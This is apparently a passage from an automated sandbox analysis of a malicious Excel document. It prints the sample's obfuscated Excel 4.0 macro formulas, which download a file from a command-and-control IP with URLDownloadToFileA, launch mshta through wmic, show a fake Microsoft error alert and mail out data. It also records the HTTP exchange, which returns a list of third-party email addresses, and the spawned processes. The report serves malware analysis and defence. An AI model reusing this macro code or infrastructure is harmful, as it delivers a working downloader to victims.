                                                                                                                                                    37,564,=B1881+C7725
                                                                                                                                                    39,564,=C9408+C1593
                                                                                                                                                    41,564,=B7395+C8573
                                                                                                                                                    42,564,=C2936+A8887
                                                                                                                                                    43,564,=B2579+C3631
                                                                                                                                                    46,564,=D9362+C3375
                                                                                                                                                    48,564,=EXEC(CHAR(119) & "mic p" & CHAR(114) & "ocess cal" & CHAR(108) & " create" & CHAR(32) & "" & CHAR(34) & "" & CHAR(109) & CHAR(115) & "hta C:\ProgramData\x" & CHAR(107) & CHAR(78) & "URUQaCiKQrGY.rt" & CHAR(102) & CHAR(34))
                                                                                                                                                    49,564,=D6941+D2952
                                                                                                                                                    50,564,=B9788+C4422
                                                                                                                                                    52,564,=D9374+A6694
                                                                                                                                                    53,564,=B1509+B4680
                                                                                                                                                    59,564,=D6553+B8799
                                                                                                                                                    60,564,=D7252+D1008
                                                                                                                                                    62,564,=A412+C3534
                                                                                                                                                    63,564,=CALL("ur" & CHAR(108) & "" & CHAR(109) & "on", CHAR(85) & "RLD" & CHAR(111) & "wnlo" & CHAR(97) & "dToFil" & CHAR(101) & CHAR(65) & "","JJC" & CHAR(67) & "JJ", 0, "http://1" & CHAR(51) & "2.148.135.183:8080/Q2" & CHAR(87) & "5VWUFL5" & CHAR(86) & CHAR(67) & "MQ7" & CHAR(74) & CHAR(81) & "PETG3CCT" & CHAR(89) & "X7" & CHAR(50) & CHAR(90) & "4R25PDG", CHAR(67) & CHAR(58) & "" & CHAR(92) & CHAR(80) & "rogram" & CHAR(68) & "ata\dDVVHyrpu" & CHAR(101) & "A.txt",0,0)
                                                                                                                                                    64,564,=D9586+B2153
                                                                                                                                                    65,564,=C7388+D8463
                                                                                                                                                    66,564,=D1369+B9278
                                                                                                                                                    72,564,=C1301+A511
                                                                                                                                                    73,564,=ALERT("Error! Send" & CHAR(105) & CHAR(110) & "g " & CHAR(114) & "eport " & CHAR(116) & CHAR(111) & " Micros" & CHAR(111) & "" & CHAR(102) & "" & CHAR(116) & "...")
                                                                                                                                                    74,564,=C3602+B3036
                                                                                                                                                    77,564,=D4442+D9946
                                                                                                                                                    78,564,=B514+D6826
                                                                                                                                                    79,564,=C1653+A7377
                                                                                                                                                    82,564,=D5827+A9220
                                                                                                                                                    83,564,=A523+A1784
                                                                                                                                                    87,564,=FOPEN("C:\ProgramData\dDV" & CHAR(86) & CHAR(72) & "yrpueA." & CHAR(116) & CHAR(120) & CHAR(116),1)
                                                                                                                                                    88,564,=A386+C7050
                                                                                                                                                    89,564,=C419+A224
                                                                                                                                                    90,564,=A5811+C6693
                                                                                                                                                    94,564,=C9342+A3772
                                                                                                                                                    95,564,=B5484+C9052
                                                                                                                                                    96,564,=B704+B6321
                                                                                                                                                    97,564,=B5621+D4829
                                                                                                                                                    102,564,=SEND.MAIL(EVALUATE(FREAD(US88,255)))
                                                                                                                                                    103,564,=A6110+D3316
                                                                                                                                                    106,564,=B4582+C2778
                                                                                                                                                    109,564,=B2114+D9698
                                                                                                                                                    110,564,=C1288+B3713
                                                                                                                                                    111,564,=C3646+A2828
                                                                                                                                                    113,564,=D1647+D4682
                                                                                                                                                    115,564,=RETURN()
                                                                                                                                                    

                                                                                                                                                    Network Behavior

                                                                                                                                                    Network Port Distribution

                                                                                                                                                    TCP Packets

                                                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                    Nov 24, 2021 17:06:42.359929085 CET497798080192.168.2.3132.148.135.183
                                                                                                                                                    Nov 24, 2021 17:06:42.517558098 CET808049779132.148.135.183192.168.2.3
                                                                                                                                                    Nov 24, 2021 17:06:42.517673016 CET497798080192.168.2.3132.148.135.183
                                                                                                                                                    Nov 24, 2021 17:06:42.518415928 CET497798080192.168.2.3132.148.135.183
                                                                                                                                                    Nov 24, 2021 17:06:42.676331043 CET808049779132.148.135.183192.168.2.3
                                                                                                                                                    Nov 24, 2021 17:06:42.972623110 CET808049779132.148.135.183192.168.2.3
                                                                                                                                                    Nov 24, 2021 17:06:42.974457026 CET497798080192.168.2.3132.148.135.183
                                                                                                                                                    Nov 24, 2021 17:07:57.972567081 CET808049779132.148.135.183192.168.2.3
                                                                                                                                                    Nov 24, 2021 17:07:57.974442959 CET497798080192.168.2.3132.148.135.183

                                                                                                                                                    HTTP Request Dependency Graph

                                                                                                                                                    • 132.148.135.183:8080

                                                                                                                                                    HTTP Packets

                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    0192.168.2.349779132.148.135.1838080C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    Nov 24, 2021 17:06:42.518415928 CET2090OUTGET /Q2W5VWUFL5VCMQ7JQPETG3CCTYX72Z4R25PDG HTTP/1.1
                                                                                                                                                    Accept: */*
                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                    Host: 132.148.135.183:8080
                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                    Nov 24, 2021 17:06:42.972623110 CET2090INHTTP/1.1 200 OK
                                                                                                                                                    Server: nginx/1.0.15
                                                                                                                                                    Date: Wed, 24 Nov 2021 16:06:42 GMT
                                                                                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    Content-Length: 141
                                                                                                                                                    Data Raw: 7b 22 64 2d 6d 63 64 61 76 69 64 40 63 61 6c 6c 79 70 61 6c 61 63 65 2e 63 6f 2e 75 6b 22 2c 22 6b 72 69 73 61 6c 6c 66 72 65 79 40 74 68 65 6c 65 67 61 6c 77 69 7a 61 72 64 73 2e 63 6f 6d 22 2c 22 62 69 65 64 61 74 40 74 65 61 63 68 69 6e 67 69 64 65 61 73 2e 63 6f 22 2c 22 73 70 65 63 73 40 73 70 65 63 73 68 6f 77 61 72 64 2e 65 64 75 22 2c 22 6d 69 6b 65 40 6d 61 73 73 67 79 6d 6e 61 73 74 69 63 73 2e 63 6f 6d 22 7d
                                                                                                                                                    Data Ascii: {"d-mcdavid@callypalace.co.uk","krisallfrey@thelegalwizards.com","biedat@teachingideas.co","specs@specshoward.edu","mike@massgymnastics.com"}


                                                                                                                                                    Code Manipulations

                                                                                                                                                    Statistics

                                                                                                                                                    CPU Usage

                                                                                                                                                    Click to jump to process

                                                                                                                                                    Memory Usage

                                                                                                                                                    Click to jump to process

                                                                                                                                                    High Level Behavior Distribution

                                                                                                                                                    Click to dive into process behavior distribution

                                                                                                                                                    Behavior

                                                                                                                                                    Click to jump to process

                                                                                                                                                    System Behavior

                                                                                                                                                    General

                                                                                                                                                    Start time:17:05:47
                                                                                                                                                    Start date:24/11/2021
                                                                                                                                                    Path:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:"C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE" /automation -Embedding
                                                                                                                                                    Imagebase:0xc70000
                                                                                                                                                    File size:27110184 bytes
                                                                                                                                                    MD5 hash:5D6638F2C8F8571C593999C58866007E
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Reputation:high

                                                                                                                                                    General

                                                                                                                                                    Start time:17:06:41
                                                                                                                                                    Start date:24/11/2021
                                                                                                                                                    Path:C:\Windows\SysWOW64\wbem\WMIC.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:wmic process call create "mshta C:\ProgramData\xkNURUQaCiKQrGY.rtf"
                                                                                                                                                    Imagebase:0xb20000
                                                                                                                                                    File size:391680 bytes
                                                                                                                                                    MD5 hash:79A01FCD1C8166C5642F37D1E0FB7BA8
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Reputation:high

                                                                                                                                                    General

                                                                                                                                                    Start time:17:06:42
                                                                                                                                                    Start date:24/11/2021
                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                    Imagebase:0x7ff7f20f0000
                                                                                                                                                    File size:625664 bytes
                                                                                                                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Reputation:high

                                                                                                                                                    General

                                                                                                                                                    Start time:17:06:43
                                                                                                                                                    Start date:24/11/2021
                                                                                                                                                    Path:C:\Windows\System32\mshta.exe
                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                    Commandline:mshta C:\ProgramData\xkNURUQaCiKQrGY.rtf
                                                                                                                                                    Imagebase:0x7ff6e3e80000
                                                                                                                                                    File size:14848 bytes
                                                                                                                                                    MD5 hash:197FC97C6A843BEBB445C1D9C58DCBDB
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Reputation:moderate

                                                                                                                                                    Disassembly

                                                                                                                                                    Code Analysis

                                                                                                                                                    Reset < >